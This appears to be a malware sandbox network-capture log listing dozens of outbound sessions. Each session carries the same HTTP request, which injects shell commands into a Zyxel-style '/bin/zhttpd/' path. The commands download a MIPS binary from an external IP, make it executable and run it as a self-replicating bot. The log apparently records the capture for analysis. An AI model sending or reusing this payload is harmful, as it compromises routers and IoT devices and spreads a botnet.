                                                        Feb 2, 2024 06:20:18.427612066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11192.168.2.1455622155.85.189.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.428282022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12192.168.2.1441344119.112.99.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.428345919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13192.168.2.143946491.146.0.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.428406954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14192.168.2.1442854198.179.179.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.428445101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15192.168.2.1437822164.239.179.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.428507090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16192.168.2.143662884.253.166.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.428533077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17192.168.2.1440570206.52.214.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.428678036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18192.168.2.144257631.243.197.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.428739071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19192.168.2.1441856219.136.40.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.428807020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20192.168.2.1458224115.80.132.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.428838968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21192.168.2.1444702125.31.154.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.428884983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22192.168.2.145984071.223.17.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.428946018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23192.168.2.1454826185.231.197.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.428996086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24192.168.2.145162644.106.85.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.429044962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25192.168.2.1458760167.249.5.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.429045916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26192.168.2.1451678180.55.197.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.429094076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27192.168.2.14443929.43.70.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.429171085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28192.168.2.145223044.249.154.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.433438063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29192.168.2.1450782109.76.253.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.433465958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30192.168.2.1460486221.188.123.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.433512926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31192.168.2.143480668.82.178.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.433553934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32192.168.2.145266250.234.67.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.433609962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33192.168.2.144546684.152.28.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.433662891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34192.168.2.1457186136.155.161.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.433686018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35192.168.2.145545669.96.223.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.433742046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36192.168.2.1455188181.252.126.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.433785915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37192.168.2.1444386193.60.233.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.433923960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        38192.168.2.1450114111.168.41.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.433928967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        39192.168.2.144789423.65.27.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.433990002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        40192.168.2.1459864198.213.130.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434020996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        41192.168.2.144241666.201.115.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434043884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        42192.168.2.1443436158.17.53.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434076071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        43192.168.2.144475684.214.23.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434179068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        44192.168.2.14503342.55.58.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434216022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        45192.168.2.1441998205.65.63.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434283972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        46192.168.2.145659044.237.192.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434288025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        47192.168.2.1438184140.72.198.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434288025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        48192.168.2.1456308162.161.179.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434313059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        49192.168.2.1451766107.190.139.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434376001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        50192.168.2.1449900157.2.188.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434459925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        51192.168.2.144875694.100.133.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434514999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        52192.168.2.1447976163.252.185.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434612989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        53192.168.2.1446010107.17.209.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434648037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        54192.168.2.143348266.75.4.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434669018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        55192.168.2.144519894.100.72.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434668064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        56192.168.2.144955292.140.225.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434726954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        57192.168.2.144029254.238.248.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434815884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        58192.168.2.145126213.90.116.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434840918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        59192.168.2.144183454.206.41.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434889078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        60192.168.2.1435170169.156.229.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434919119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        61192.168.2.1444912198.10.91.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.434959888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        62192.168.2.1435772108.230.108.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435003996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        63192.168.2.1436806135.94.115.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435024977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        64192.168.2.1434566113.1.234.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435101986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        65192.168.2.144085269.157.17.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435101986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        66192.168.2.143970051.233.6.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435148954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        67192.168.2.1437184192.236.15.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435213089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        68192.168.2.1452046125.74.226.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435250044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        69192.168.2.1432776209.58.36.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435290098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        70192.168.2.1437996112.18.248.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435334921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        71192.168.2.144138274.112.84.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435381889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        72192.168.2.1456156192.122.20.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435476065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        73192.168.2.144360423.80.78.86443
                                                        TimestampBytes transferredDirectionData
